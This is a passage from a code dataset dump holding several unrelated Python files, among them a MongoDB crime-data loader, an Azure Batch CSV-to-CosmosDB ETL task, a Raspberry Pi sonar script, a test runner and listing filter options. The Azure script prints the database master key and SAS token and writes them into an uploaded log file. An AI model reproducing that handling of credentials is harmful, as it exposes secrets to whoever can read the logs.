orphan_point_count = self.count_group_orphan(bkt_ary)\n\t\t\t\tprint('Iter {}: Reduced point number = {}; Group bucket number={}; Orphan point number={}'.format(\n\t\t\t\t\titer_num, group_num, group_bkt_count, orphan_point_count))\n\n\t\tif self.verbose > 0:\n\t\t\tprint('Total iteration = {}; Number of reduced points = {}'.format(iter_num, group_num))\n\t\treturn reduced_X, group_weight.flatten(), labels, iter_num\n\n\n\tdef radius_bkt_improve(self, reduced_X, bkt_ary, R2, bkt_num):\n\t\tif sp.issparse(reduced_X):\n\t\t\tdata, indices, indptr = reduced_X.data, reduced_X.indices, reduced_X.indptr\n\t\t\treturn sparsex_radius_bkt_improve(data, indices, indptr, reduced_X.shape[0], reduced_X.shape[1], bkt_ary, R2, bkt_num)\n\t\telse:\n\t\t\treturn densex_radius_bkt_improve(reduced_X, bkt_ary, R2, bkt_num)\n\n\n\tdef bkt_ary_buckets_keepr_wrapper(self, bkt_ary, handle_func, *args, **kwargs):\n\t\tbuckets = self.bkt_ary_to_buckets(bkt_ary)\n\t\tgroup_buckets, orphan_points = self.split_group_orphan(buckets)\n\n\t\tsorted_idx, keep_num = handle_func(group_buckets, *args, **kwargs)\n\n\t\tfor i, idx in enumerate(sorted_idx[:keep_num]):\n\t\t\tbkt_ary[group_buckets[idx]] = i\n\t\torphan_points.extend([p_idx for bkt_idx in sorted_idx[keep_num:] for p_idx in group_buckets[bkt_idx]])\n\t\tbkt_num = len(orphan_points) + keep_num\n\t\tbkt_ary[orphan_points] = np.arange(keep_num, bkt_num, dtype=np.uint32)\n\n\t\treturn bkt_num\n\n\n\tdef min_bkt_size_bkt_improve(self, bkt_ary):\n\t\t# TODO: write with c++\n\t\treturn self.bkt_ary_buckets_keepr_wrapper(bkt_ary, self.min_bkt_size_bkt_improve_)\n\n\n\tdef min_bkt_size_bkt_improve_(self, group_buckets):\n\t\tsorted_idx = np.argsort([len(bkt) for bkt in group_buckets])\n\t\tkeep_num = int(len(group_buckets) * self.bkt_size_keepr)\n\t\treturn sorted_idx, keep_num\n\n\n\tdef min_center_dist_bkt_improve(self, bkt_ary, X):\n\t\t# TODO: write with c++\n\t\treturn self.bkt_ary_buckets_keepr_wrapper(bkt_ary, 
self.min_center_dist_bkt_improve_, X)\n\n\n\tdef min_center_dist_bkt_improve_(self, group_buckets, X):\n\t\tkeep_num = int(len(group_buckets) * self.center_dist_keepr)\n\t\tdist_ary = []\n\t\tfor bkt in group_buckets:\n\t\t\tcenter = np.mean(X[bkt], axis=0)\n\t\t\tif sp.issparse(X):\n\t\t\t\tcenter = sp.csr_matrix(center)\n\t\t\tdist_ary.append(np.median(self.cal_dist2_ary_func(X[bkt], center))) # (bucket_size,)\n\t\tsorted_idx = np.argsort(dist_ary)\n\t\treturn sorted_idx, keep_num\n\n\n\tdef update_x_and_weight(self, reduced_X, weight, bkt_ary, bkt_num):\n\t\tif sp.issparse(reduced_X):\n\t\t\treturn update_sparsex_and_weight(reduced_X, weight, bkt_ary, bkt_num)\n\t\telse:\n\t\t\treturn update_densex_and_weight(reduced_X, weight, bkt_ary, bkt_num)\n\n\n\tdef bkt_ary_to_buckets(self, bkt_ary):\n\t\td = {}\n\t\tfor i, bkt_id in enumerate(bkt_ary):\n\t\t\td.setdefault(bkt_id, []).append(i)\n\t\treturn list(d.values())\n\n\n\tdef count_group_orphan(self, bkt_ary):\n\t\tcounter = Counter(bkt_ary)\n\t\torphan_count = 0\n\t\tfor bkt_id, member_count in counter.items():\n\t\t\tif member_count == 1:\n\t\t\t\torphan_count += 1\n\t\treturn len(counter) - orphan_count, orphan_count\n\n\n","sub_path":"rph_kmeans/point_reducer_cy.py","file_name":"point_reducer_cy.py","file_ext":"py","file_size_in_byte":6104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"185188791","text":"import pymongo as pm\nimport numpy as np\nimport csv\nimport json\nfrom geopy import distance\n\ndef main():\n\tconnection = pm.MongoClient()\n\tbuffalo = connection.buffalo\n\n\tdirectory = \"../../data/\"\n\tcamerasData = readGeoJson(directory+\"Buffalo Police Department Camera Locations.geojson\")\n\tpoliceDistricts = readGeoJson(directory+\"Police Districts.geojson\")\n\tstreetsData = readGeoJson(directory+\"Streets.geojson\")\n\tcrimeData = readCSV(directory+\"Crime_Incidents.csv\")\n\n\tprint(\"Dropping Cameras...\")\n\tbuffalo.cameras.drop()\n\tprint(\"Cameras dropped!\")\n\tbuffalo.cameras.create_index([(\"geometry\", \"2dsphere\")])\n\tprint(\"Loading Cameras...\")\n\tingestGeoJsonFeatureToMongoDB(camerasData, buffalo.cameras)\n\tprint(\"Cameras loaded!\")\n\n\n\tprint(\"Dropping Districts...\")\n\tbuffalo.districts.drop()\n\tprint(\"Districts dropped!\")\n\tbuffalo.districts.create_index([(\"geometry\", \"2dsphere\")])\n\tprint(\"Loading Districts...\")\n\tingestGeoJsonFeatureToMongoDB(policeDistricts, buffalo.districts)\n\tprint(\"Districts loaded!\")\n\n\n\tprint(\"Dropping Streets...\")\n\tbuffalo.streets.drop()\n\tprint(\"Streets dropped!\")\n\tbuffalo.streets.create_index([(\"geometry\", \"2dsphere\")])\n\tprint(\"Loading Streets...\")\n\tingestGeoJsonFeatureToMongoDB(streetsData, buffalo.streets)\n\tprint(\"Streets loaded!\")\n\n\n\tprint(\"Updating Streets...\")\n\t# Update each street with a length\n\tcursor = buffalo.streets.find()\n\twhile cursor.alive:\n\t\tlength = 0\n\t\ttoken = cursor.next()\n\t\tcoords = token['geometry']['coordinates']\n\t\tfor i in range(len(coords)):\n\t\t\tfor j in range(len(coords[i])):\n\t\t\t\tfor k in range(j+1, len(coords[i])):\n\t\t\t\t\tlength += getLength(coords[i][j], coords[i][k])\n\t\tbuffalo.streets.update_one( {\"_id\":token['_id']}, {\"$set\": { \"streetLength\": length }} )\n\tprint(\"Streets updated!\")\n\n\n\t'''\n\t['incident_id' 'case_number' 'incident_datetime' 'incident_type_primary'\n\t 'incident_description' 'clearance_type' 'address_1' 'address_2' 'city'\n\t 'state' 'zip' 'country' 'latitude' 'longitude' 
'created_at' 'updated_at'\n\t 'location' 'hour_of_day' 'day_of_week' 'parent_incident_type']\n\t'''\n\tprint(\"Dropping Crimes...\")\n\tbuffalo.crimes.drop()\n\tprint(\"Crimes dropped!\")\n\tbuffalo.crimes.create_index([(\"location\", pm.GEO2D)])\n\tprint(\"Loading Crimes...\")\n\tkeys = crimeData[0]\n\tfor i in range(1, len(crimeData)):\n\t\tpayload = getJson(keys, crimeData[i])\n\t\tpayload['location'] = str(payload['longitude']) + ',' + str(payload['latitude'] )\n\t\tbuffalo.crimes.insert_one(payload)\n\tprint(\"Crimes loaded!\")\n\n\n\n\tprint(\"Updating Crimes...\")\n\tcursor = buffalo.crimes.find()\n\ti = 0\n\twhile cursor.alive:\n\t\ti += 1\n\t\tif i % 5000 == 0:\n\t\t\tprint(i, \" tokens processed...\")\n\t\ttoken = cursor.next()\n\t\tloc = token['location'].split(',')\n\t\tloc[0] = float(loc[0])\n\t\tloc[1] = float(loc[1])\n\t\tnear = {\"geometry\": {\"$near\": {\"$geometry\": {\"type\": \"Point\" ,\"coordinates\": loc } } } }\n\t\tnear = buffalo.cameras.find(near).limit(1).next()\n\t\tnearLoc = near['geometry']['coordinates']\n\t\tclosestCamera = distance.distance((nearLoc[1], nearLoc[0]), (loc[1], loc[0])).miles\n\t\tbuffalo.crimes.update_one( {\"_id\":token['_id']}, {\"$set\": { \"closestCamera\": closestCamera }} )\t\t\n\tprint(\"Crimes updated!\")\n\n\ndef readGeoJson(FILE_PATH):\n\twith open(FILE_PATH, 'r') as f:\n\t\treturn json.load(f)\n\ndef ingestGeoJsonFeatureToMongoDB(geojson, collection):\n\tfor feature in geojson['features']:\n\t\tcollection.insert_one(feature)\n\ndef readCSV(FILE_PATH):\n\tCSV = []\n\twith open(FILE_PATH, 'r') as F:\n\t\tCSV = list(csv.reader(F, quotechar='\"', delimiter=','))\n\treturn np.array(CSV)\n\ndef getJson(keys, values):\n\tpayload = {}\n\tfor i,j in zip(keys,values):\n\t\ttry:\n\t\t\tpayload[i] = float(j)\n\t\texcept:\n\t\t\tpayload[i] = j \n\treturn payload\n\n'''\nKnowing that you're receiving location points as (long, lat), because that is how\nMongoDB deal with location points, and you need to swap them for this function.\n'''\ndef getLength(loc1, loc2):\n\treturn distance.distance((loc1[1], loc1[0]), (loc2[1], loc2[0])).miles\n\n\t\t\t\t\t\n\nif __name__ == '__main__':\n\tmain()","sub_path":"src/scripts/loadBuffaloData.py","file_name":"loadBuffaloData.py","file_ext":"py","file_size_in_byte":3925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"413235813","text":"from __future__ import print_function\nimport argparse\nimport collections\nimport csv\nimport json\nimport os\nimport string\nimport time\nimport zipfile\n\nimport azure.storage.blob as azureblob\n\nimport pydocumentdb.documents as documents\nimport pydocumentdb.document_client as document_client\nimport pydocumentdb.errors as errors\n\n# Azure Batch Task which will be executed on the Azure Batch nodes.\n# It parses the given csv file and inserts the data into Azure CosmosDB.\n# Chris Joakim, Microsoft, 2018/09/13\n\ndef is_dev_env(args):\n if ('' + args.dev).lower() == 'true':\n return True\n else:\n return False\n\ndef is_azure_env(args):\n if is_dev_env(args):\n return False\n else:\n return True\n\ndef create_docdb_client(args):\n return document_client.DocumentClient(args.docdbhost, {'masterKey': args.docdbkey})\n\ndef write_log_data(blob_client, container, args, log_data):\n try:\n # see https://docs.microsoft.com/en-us/azure/batch/batch-compute-node-environment-variables\n job_id = str(os.environ.get('AZ_BATCH_JOB_ID'))\n task_id = str(os.environ.get('AZ_BATCH_TASK_ID'))\n output_file = 
'{}-{}-log_data.json'.format(job_id, task_id)\n output_file_path = os.path.realpath(output_file) \n log_json = json.dumps(log_data, sort_keys=True, indent=2)\n with open(output_file, 'w') as f:\n f.write(log_json)\n blob_client.create_blob_from_path(\n container,\n output_file,\n output_file_path)\n except KeyError:\n app_events.append('ERROR in write_log_data')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--filepath', required=True, help='The path to the zip file to process')\n parser.add_argument('--storageaccount', required=True, help='The name the Azure Storage account for results.')\n parser.add_argument('--storagecontainer', required=True, help='The Azure Blob storage container for results.')\n parser.add_argument('--sastoken', required=True, help='The SAS token providing write access to the Storage container.')\n parser.add_argument('--idx', required=True, help='The index number of the file within the job')\n parser.add_argument('--docdbhost', required=True, help='CosmosDB host, AZURE_COSMOSDB_DOCDB_URI')\n parser.add_argument('--docdbkey', required=True, help='CosmosDB key, AZURE_COSMOSDB_DOCDB_KEY')\n parser.add_argument('--dev', required=True, help='Specify True if local development on macOS/Windows')\n args = parser.parse_args()\n epoch = int(time.time())\n\n print('args.filepath: {}'.format(args.filepath))\n print('args.storageaccount: {}'.format(args.storageaccount))\n print('args.storagecontainer: {}'.format(args.storagecontainer))\n print('args.sastoken: {}'.format(args.sastoken))\n print('args.idx: {}'.format(str(args.idx)))\n print('args.docdbhost: {}'.format(args.docdbhost))\n print('args.docdbkey: {}'.format(args.docdbkey))\n print('args.dev: {}'.format(args.dev))\n print('is_dev_env: {}'.format(is_dev_env(args)))\n print('is_azure_env: {}'.format(is_azure_env(args)))\n print('epoch: {}'.format(epoch))\n\n # Create the blob client using the container's SAS token, and upload the unzipped csv file(s) to it.\n if is_azure_env(args):\n log_data = dict()\n app_events = list()\n log_data['epoch'] = epoch\n log_data['app_events'] = app_events\n log_data['storageaccount'] = args.storageaccount\n log_data['storagecontainer'] = args.storagecontainer\n log_data['sastoken'] = args.sastoken\n log_data['docdbhost'] = args.docdbhost\n log_data['docdbkey'] = args.docdbkey\n log_data['filepath'] = args.filepath\n log_data['dev'] = args.dev\n\n docdb_client = create_docdb_client(args)\n input_file = os.path.realpath(args.filepath)\n db_link = 'dbs/dev'\n coll_link = db_link + '/colls/zipdata'\n\n print('input_file: {}'.format(input_file))\n log_data['input_file'] = input_file\n log_data['coll_link'] = coll_link\n\n with open(input_file, 'rt') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n header = None # id,postal_cd,country_cd,city_name,state_abbrv,latitude,longitude\n for idx, row in enumerate(reader):\n if idx < 1:\n header = row\n else:\n data = dict()\n for fidx, field in enumerate(header):\n data[field] = row[fidx] # add each field of the csv to the data dict\n\n data['pk'] = data['city_name'] # use city as the CosmosDB partition key\n data['seq'] = data['id'] # unset the 'id' from the csv, CosmosDB will populate it\n del data['id']\n\n # Add GPS info in GeoJSON format\n location, lat, lng = dict(), float(data['latitude']), float(data['longitude'])\n coordinates = [ lng, lat ]\n location['type'] = 'Point'\n location['coordinates'] = coordinates\n data['location'] = location\n\n doc = docdb_client.CreateDocument(coll_link, 
data)\n print(json.dumps(doc, sort_keys=False, indent=2))\n\n blob_client = azureblob.BlockBlobService(\n account_name=args.storageaccount,\n sas_token=args.sastoken)\n \n write_log_data(blob_client, args.storagecontainer, args, log_data)\n else:\n print('dev mode; no result blob processing')\n","sub_path":"examples/csv_etl_task.py","file_name":"csv_etl_task.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"165958767","text":"import RPi.GPIO as GPIO\r\nimport time\r\n\r\ntrigPin = 16\r\nechoPin = 18\r\nMAX_DISTANCE = 300 # Define the maximum measured distance (in CM)\r\ntimeOut = MAX_DISTANCE*60 # Calculate timeout according to the maximum measured distance\r\n\r\ndef pulseIn(pin,level,timeOut): # Function pulseIn: Get the pulse time of a pin\r\n t0 = time.time()\r\n while(GPIO.input(pin) != level):\r\n if((time.time() - t0) > timeOut*0.000001):\r\n return 0;\r\n t0 = time.time()\r\n while(GPIO.input(pin) == level):\r\n if((time.time() - t0) > timeOut*0.000001):\r\n return 0;\r\n pulseTime = (time.time() - t0)*1000000\r\n return pulseTime\r\n \r\ndef getSonar(): # Response from UltraSonic sensor in CM\r\n GPIO.output(trigPin,GPIO.HIGH) # trigPin send 10us High Level signal\r\n time.sleep(0.00001) #10us\r\n GPIO.output(trigPin,GPIO.LOW)\r\n pingTime = pulseIn(echoPin,GPIO.HIGH,timeOut) # Read & Echo Time\r\n distance = pingTime * 340.0 / 2.0 / 10000.0 # Speed of Sound is 340m/s & calc distance\r\n return distance\r\n \r\ndef setup():\r\n print ('UltraSonix Script is starting...')\r\n GPIO.setmode(GPIO.BOARD) #numbers GPIOs by physical location\r\n GPIO.setup(trigPin, GPIO.OUT) \r\n GPIO.setup(echoPin, GPIO.IN) \r\n\r\ndef loop():\r\n while(True):\r\n distance = getSonar()\r\n print (\"The distance is : %.2f cm\"%(distance))\r\n time.sleep(1)\r\n \r\nif __name__ == '__main__': \r\n setup()\r\n try:\r\n loop()\r\n except KeyboardInterrupt: \r\n GPIO.cleanup() ","sub_path":"Local Scripts/UltraSonic.py","file_name":"UltraSonic.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"195775983","text":"# -*- coding: utf-8 -*-\n# ------------------------------------------------------------------------------\n# Name: multiprocesssTest.py\n# Purpose: Controller for all tests in project run concurrently.\n#\n# Authors: Michael Scott Cuthbert\n#\n# Copyright: Copyright © 2012-18 MIT DH Lab\n# forked from music21 Copyright © 2012-15\n# License: BSD, see license.txt\n# ------------------------------------------------------------------------------\n'''\nMultiprocess testing. Tests all doctests and Test unittest objects in all\nmodules that are imported when running \"import music21\". Runs threads on\neach core of a multicore system unless there are more than 2 cores, in which\ncase it runs on n-1 cores.\n\nN.B. this gets a slightly different set of modules than test/test.py does\nbecause the `imp` module is not available for threaded processing. Running\nboth modules gives great coverage of just about everything -- do that before\nbuilding a new release.\n\nRun testDocumentation after this.\n'''\nimport collections\nimport multiprocessing\nimport os\nimport sys\nimport tempfile\nimport time\nimport unittest\n\nfrom . import common\nfrom . import testRunner\nfrom . 
import commonTest\n\nModuleResponse = collections.namedtuple('ModuleResponse',\n 'returnCode fp moduleName success testRunner '\n + 'errors failures testsRun runTime')\nModuleResponse.__new__.__defaults__ = (None,) * len(ModuleResponse._fields)\n\n\n# ------------------------------------------------------------------------------\n\ndef run_one_module_without_imp(arguments):\n modGath, fp = arguments # modGather object, filepath\n verbosity = False\n timeStart = time.time()\n moduleObject = modGath.get_module_without_imp(fp)\n globs = common.import_main_module().__dict__.copy()\n\n # environLocal.printDebug('running %s \\n' % fp)\n if moduleObject == 'skip':\n success = '%s is skipped \\n' % fp\n # environLocal.printDebug(success)\n return ModuleResponse('Skipped', fp, success)\n elif moduleObject == 'notInTree':\n success = ('%s is in the directory but not imported in project. Skipped -- fix!' %\n modGath._getNamePeriod(fp))\n # environLocal.printDebug(success)\n return ModuleResponse(\"NotInTree\", fp, success)\n\n\n try:\n moduleName = modGath._getName(fp)\n\n s1 = commonTest.default_doctest_suite()\n\n # get Test classes in moduleObject\n if not hasattr(moduleObject, 'Test'):\n pass\n # environLocal.printDebug('%s has no Test class' % moduleObject)\n else:\n s2 = unittest.defaultTestLoader.loadTestsFromTestCase(moduleObject.Test)\n s1.addTests(s2)\n\n try:\n s3 = commonTest.default_doctest_suite(moduleObject, globs=globs)\n s1.addTests(s3)\n except ValueError:\n # environLocal.printDebug('%s cannot load Doctests' % moduleObject)\n pass\n\n testRunner.fixDoctests(s1)\n\n\n # environLocal.printDebug('running Tests...\\n')\n runner = commonTest.ProjectTestRunner(verbosity=verbosity)\n try:\n testResult = runner.run(s1)\n\n # need to make testResult pickleable by removing the instancemethod parts...\n errors = []\n for e in testResult.errors:\n errors.append(e[1])\n failures = []\n for f in testResult.failures:\n failures.append(f[1])\n runTime = round(10 * (time.time() - timeStart)) / 10.0\n return ModuleResponse(\"TestsRun\", fp, moduleName, testResult.wasSuccessful(),\n str(testResult), errors, failures, testResult.testsRun, runTime)\n except Exception as excp: # pylint: disable=broad-except\n # environLocal.printDebug('*** Exception in running %s: %s...\\n' % (moduleName, excp))\n return ModuleResponse(\"TrappedException\", fp, moduleName, None, str(excp))\n except Exception as excp: # pylint: disable=broad-except\n # environLocal.printDebug('*** Large Exception in running %s: %s...\\n' % (fp, excp))\n return ModuleResponse(\"LargeException\", fp, None, None, str(excp))\n\n\ndef main(test_group=None):\n '''\n Run all tests. test_group is not used (always the test suite)\n '''\n normalStdError = sys.stderr\n\n timeStart = time.time()\n poolSize = common.cpus()\n\n print('Creating %d processes for multiprocessing' % poolSize)\n\n modGather = commonTest.ModuleGather(useExtended=True)\n\n maxTimeout = 200\n pathsToRun = modGather.modulePaths # [30:60]\n\n pool = multiprocessing.Pool(processes=poolSize) # @UndefinedVariable # pylint: disable=not-callable\n\n # imap returns the results as they are completed. 
Since the number of files is small,\n # the overhead of returning is outweighed by the positive aspect of getting results immediately\n # unordered says that results can RETURN in any order; not that they'd be pooled out in any\n # order.\n modGather_with_fp = [(modGather, fp) for fp in pathsToRun]\n res = pool.imap_unordered(run_one_module_without_imp, modGather_with_fp)\n\n continueIt = True\n timeouts = 0\n eventsProcessed = 0\n summaryOutput = []\n\n while continueIt is True:\n try:\n newResult = res.next(timeout=1)\n if timeouts >= 5:\n print(\"\")\n if newResult is not None:\n if newResult.moduleName is not None:\n mn = str(newResult.moduleName)\n mn = mn.replace('___init__', '')\n mn = mn.replace('_', '.')\n else:\n mn = \"\"\n rt = newResult.runTime\n if rt is not None:\n rt = round(newResult.runTime * 10) / 10\n if not newResult.errors and not newResult.failures:\n print(\"\\t\\t\\t\\t{0}: {1} tests in {2} secs\".format(\n mn,\n newResult.testsRun,\n rt))\n else:\n print(\"\\t\\t\\t\\t{0}: {1} tests, {2} errors {3} failures in {4} secs\".format(\n mn,\n newResult.testsRun,\n len(newResult.errors),\n len(newResult.failures),\n rt))\n timeouts = 0\n eventsProcessed += 1\n summaryOutput.append(newResult)\n except multiprocessing.TimeoutError: # @UndefinedVariable\n timeouts += 1\n if timeouts == 5 and eventsProcessed > 0:\n print(\"Delay in processing, seconds: \", end=\"\")\n elif timeouts == 5:\n print(\"Starting first modules, should take 5-10 seconds: \", end=\"\")\n\n if timeouts % 5 == 0:\n print(str(timeouts) + \" \", end=\"\", flush=True)\n if timeouts > maxTimeout and eventsProcessed > 0:\n print(\"\\nToo many delays, giving up...\", flush=True)\n continueIt = False\n printSummary(summaryOutput, timeStart, pathsToRun)\n pool.close()\n exit()\n except StopIteration:\n continueIt = False\n pool.close()\n pool.join()\n except Exception as excp: # pylint: disable=broad-except\n eventsProcessed += 1\n exceptionLog = ModuleResponse(\"UntrappedException\", None, \"%s\" % excp)\n summaryOutput.append(exceptionLog)\n\n sys.stderr = normalStdError\n printSummary(summaryOutput, timeStart, pathsToRun)\n\n\ndef printSummary(summaryOutput, timeStart, pathsToRun):\n outStr = ''\n summaryOutputTwo = [i[1] for i in summaryOutput]\n for fp in pathsToRun:\n if fp not in summaryOutputTwo:\n failLog = ModuleResponse(\"NoResult\", fp)\n summaryOutput.append(failLog)\n\n totalTests = 0\n\n skippedSummary = []\n successSummary = []\n errorsFoundSummary = []\n otherSummary = []\n for moduleResponse in summaryOutput:\n print(moduleResponse)\n if moduleResponse.returnCode == 'Skipped':\n skippedSummary.append(\"Skipped: %s\" % moduleResponse.fp)\n elif moduleResponse.returnCode == 'NoResult':\n otherSummary.append(\"Silent test fail for %s: Run separately!\" % moduleResponse.fp)\n elif moduleResponse.returnCode == 'UntrappedException':\n otherSummary.append(\"Untrapped Exception for unknown module: %s\" % moduleResponse.fp)\n elif moduleResponse.returnCode == 'TrappedException':\n otherSummary.append(\"Trapped Exception for module %s, at %s: %s\" %\n (moduleResponse.moduleName,\n moduleResponse.fp,\n moduleResponse.testRunner))\n elif moduleResponse.returnCode == 'LargeException':\n otherSummary.append(\"Large Exception for file %s: %s\" %\n (moduleResponse.fp, moduleResponse.testResult))\n elif moduleResponse.returnCode == 'ImportError':\n otherSummary.append(\"Import Error for %s\" % moduleResponse.fp)\n elif moduleResponse.returnCode == 'NotInTree':\n if moduleResponse.moduleName == \"\":\n 
otherSummary.append(\"Not in Tree Error: %s \" % moduleResponse.moduleName)\n elif moduleResponse.returnCode == 'TestsRun':\n totalTests += moduleResponse.testsRun\n if moduleResponse.success:\n successSummary.append(\"%s successfully ran %d tests in %d seconds\"\n % (moduleResponse.moduleName,\n moduleResponse.testsRun,\n moduleResponse.runTime))\n else:\n errorsList = moduleResponse.errors\n # not the original errors list! see pickle note above\n failuresList = moduleResponse.failures\n errorsFoundSummary.append(\n \"\\n-----------------------------\\n\"\n + \"%s had %d ERRORS and %d FAILURES in %d tests after %d seconds:\\n\" %\n (moduleResponse.moduleName, len(errorsList),\n len(failuresList), moduleResponse.testsRun, moduleResponse.runTime)\n + \"-----------------------------\\n\")\n\n for e in errorsList:\n outStr += e + \"\\n\"\n errorsFoundSummary.append('%s' % (e))\n for f in failuresList:\n outStr += f + \"\\n\"\n errorsFoundSummary.append('%s' % (f))\n else:\n otherSummary.append(\"Unknown return code %s\" % moduleResponse)\n\n\n outStr += \"\\n\\n---------------SUMMARY---------------------------------------------------\\n\"\n for l in skippedSummary:\n outStr += l + \"\\n\"\n for l in successSummary:\n outStr += l + \"\\n\"\n for l in otherSummary:\n outStr += l + \"\\n\"\n for l in errorsFoundSummary:\n outStr += l + \"\\n\"\n outStr += \"-------------------------------------------------------------------------\\n\"\n elapsedTime = time.time() - timeStart\n outStr += \"Ran %d tests in %.4f seconds\\n\" % (totalTests, elapsedTime)\n sys.stdout.flush()\n print(outStr)\n sys.stdout.flush()\n\n import datetime\n lastResults = os.path.join(tempfile.gettempdir(), 'lastResults.txt')\n with open(lastResults, 'w') as f:\n f.write(outStr)\n f.write(\"Run at \" + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n\n print(\"Results at \" + lastResults)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"dh_testers/multiprocess.py","file_name":"multiprocess.py","file_ext":"py","file_size_in_byte":11834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"114531201","text":"from collections import OrderedDict\nfrom ob.models import Listing, Profile\nfrom django.conf import settings\nfrom django.utils.translation import ugettext_lazy as _\nfrom .util import build_options, build_checkbox\nfrom .common import get_nsfw_options, get_currency_type_options, \\\n get_clear_all_options, get_network_options\nfrom .static import country_list\n\n\ndef get_listing_options(params):\n available_options = [\n (\"acceptedCurrencies\", {\n \"type\": \"checkbox\",\n \"label\": _(\"Accepted Currencies\"),\n \"options\": get_currency_type_options(params)\n }),\n (\"moderator_verified\", {\n \"type\": \"checkbox\",\n \"label\": _(\"Verified Moderator\"),\n \"options\": get_moderator_verified_options(params)\n }),\n (\"moderator_count\", {\n \"type\": \"radio\",\n \"label\": _(\"Moderators Available\"),\n \"options\": get_moderator_options(params)\n }),\n (\"nsfw\", {\n \"type\": \"radio\",\n \"label\": _(\"Adult Content\"),\n \"options\": get_nsfw_options(params)\n }),\n (\"condition_type\", {\n \"type\": \"radio\",\n \"label\": _(\"Condition\"),\n \"options\": get_condition_type_options(params)\n }),\n (\"rating\", {\n \"type\": \"radio\",\n \"label\": _(\"Rating\"),\n \"options\": get_rating_options(params)\n }),\n (\"contract_type\", {\n \"type\": \"radio\",\n \"label\": _(\"Type\"),\n \"options\": get_contract_type_options(params)\n }),\n 
(\"shipping\", {\n \"type\": \"dropdown\",\n \"label\": _(\"Ships to\"),\n \"options\": get_region_options(params)\n }),\n (\"free_shipping_region\", {\n \"type\": \"checkbox\",\n \"label\": _(\"Ships Free\"),\n \"options\": get_free_shipping_options(params)\n }),\n (\"connection\", {\n \"type\": \"radio\",\n \"label\": _(\"Connection Type (Alpha)\"),\n \"options\": get_connection_options(params)\n }),\n (\"network\", {\n \"type\": \"radio\",\n \"label\": _(\"Network\"),\n \"options\": get_network_options(params)\n }),\n (\"dust\", {\n \"type\": \"checkbox\",\n \"label\": _(\"Show Dust\"),\n \"options\": get_dust_options(params)\n }),\n (\"clear_all\", {\n \"type\": \"checkbox\",\n \"label\": _(\"Reset\"),\n \"options\": get_clear_all_options()\n }),\n ]\n\n if settings.DEV:\n from .dev import get_debug_options\n available_options += get_debug_options(params)\n\n options = OrderedDict(available_options)\n\n return options\n\n\ndef get_moderator_verified_options(params):\n # Build verified moderator options\n\n if 'moderator_verified' in params.keys():\n try:\n if params['moderator_verified'] == 'true':\n moderator_verified = True\n elif params['moderator_verified'] == 'false':\n moderator_verified = ''\n elif params['moderator_verified'] == '':\n moderator_verified = ''\n else:\n moderator_verified = ''\n except ValueError:\n moderator_verified = ''\n else:\n moderator_verified = ''\n\n moderator_verified_choices = dict([(True, 'OB1 Verified Moderator'), ])\n\n return build_options(moderator_verified, moderator_verified_choices)\n\n\ndef get_moderator_options(params):\n # Build number of moderator options\n\n if 'moderator_count' in params.keys():\n try:\n moderator_count = int(params['moderator_count'])\n except ValueError:\n moderator_count = 0\n else:\n moderator_count = 0\n\n moderator_options = [\n {\n \"value\": v,\n \"label\": '\\u2696' * v + ' ' + str(v) + '+',\n \"checked\": v == moderator_count,\n \"default\": False\n } for v in range(3, -1, -1)\n ]\n moderator_options[1]['default'] = True\n\n return moderator_options\n\n\ndef get_region(params):\n return params['shipping'] if 'shipping' in params.keys() else 'any'\n\n\ndef get_region_options(params):\n region = get_region(params)\n\n distinct_region = OrderedDict(\n country_list\n )\n\n return build_options(region, distinct_region)\n\n\ndef get_free_shipping_options(params):\n try:\n free_shipping = True if params['free_shipping_region'] == 'true' else ''\n except ValueError:\n free_shipping = ''\n region = get_region(params)\n if region and region.lower() != 'any':\n to_str = _('to {place}').format(place=region.title().replace('_', ' '))\n free_shipping_choices = OrderedDict([(True, to_str), ])\n else:\n free_shipping_choices = OrderedDict([(True, _('to Anywhere')), ])\n return build_options(free_shipping, free_shipping_choices)\n\n\ndef get_contract_type_options(params):\n try:\n contract = int(params['contract_type'])\n except (ValueError, KeyError):\n contract = ''\n\n return build_options(contract, Listing.CONTRACT_TYPE_DICT)\n\n\ndef get_condition_type_options(params):\n try:\n condition = int(params['condition_type'])\n except (ValueError, KeyError):\n condition = ''\n\n return build_options(condition, Listing.CONDITION_TYPE_DICT)\n\n\ndef get_rating_options(params):\n try:\n rating = float(params['rating'])\n except (ValueError, KeyError):\n rating = 0\n\n return [\n {\n \"value\": v,\n \"label\": \"{:.2f}\".format(v) + ' >=',\n \"checked\": v == rating,\n \"default\": False\n } for v in [5.0, 4.95, 4.8, 4.5, 4.0, 0.0]\n 
]\n\n\ndef get_connection_options(params):\n try:\n connection = int(params['connection'])\n except (ValueError, KeyError):\n connection = ''\n return build_options(connection, Profile.CONNECTION_TYPE_DICT)\n\n\ndef get_dust_options(params):\n try:\n dust = True if params['dust'] == 'true' else False\n\n except (ValueError, KeyError):\n dust = ''\n dust_str = _('> ~{p}% Bitcoin Fee').format(p=settings.DUST_FEE_PERCENT)\n dust_choices = OrderedDict([(True, dust_str), ])\n return build_options(dust, dust_choices)\n","sub_path":"ob/api/param/listing.py","file_name":"listing.py","file_ext":"py","file_size_in_byte":6230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"213067503","text":"# This is designed to be used with Zoidberg bot, however I'm sure it could be adapted to work with your own projects.\n# If there is an issue that might cause issue on your own bot, feel free to pull request if it will improve something.<3\nimport discord\nfrom discord.ext import commands\nfrom dislash import *\n\nfrom bot import guilds\nfrom zoidbergbot.paginate import Element\n\n\nasync def create_menu(ctx: SlashInteraction, menu):\n # Build buttons\n button_row_1 = ActionRow(\n Button(\n style=ButtonStyle.blurple,\n emoji=\"⬆\",\n custom_id=\"up\"\n ),\n Button(\n 